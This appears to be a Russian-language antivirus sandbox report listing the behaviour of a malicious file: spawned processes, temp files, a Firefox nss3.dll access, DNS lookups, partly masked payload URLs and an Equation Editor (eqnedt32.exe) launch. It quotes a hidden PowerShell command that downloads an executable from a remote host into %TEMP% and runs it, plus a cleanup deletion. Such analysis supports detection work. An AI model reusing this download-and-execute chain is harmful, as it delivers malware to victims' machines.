Техническая информация
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$eZ=$env:temp+'\TTI.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://br######ia-worldwide.co.uk/frityst/over.exe' -Destination $eZ;(New-Object -com Shell.Ap...
- %WINDIR%\explorer.exe
- %WINDIR%\syswow64\wuapp.exe
- tti.exe
- iexplore.exe
- firefox.exe
- Процесс firefox.exe, модуль nss3.dll
- %TEMP%\bit55f2.tmp
- %TEMP%\bit6eba.tmp
- %TEMP%\bit55f2.tmp
- %TEMP%\bit6eba.tmp
- %TEMP%\bit6eba.tmp в %TEMP%\tti.exe
- %TEMP%\bit55f2.tmp в %TEMP%\tti.exe
- %TEMP%\tti.exe
- http://br######ia-worldwide.co.uk/frityst/over.exe
- http://17#.#3.162.253/bin_eFLcWSQ29.bin
- DNS ASK br######ia-worldwide.co.uk
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$eZ=$env:temp+'\TTI.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://br######ia-worldwide.co.uk/frityst/over.exe' -Destination $eZ;(New-Object -com Shell.Ap...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\wuapp.exe'
- '%WINDIR%\syswow64\cmd.exe' del "%TEMP%\TTI.exe"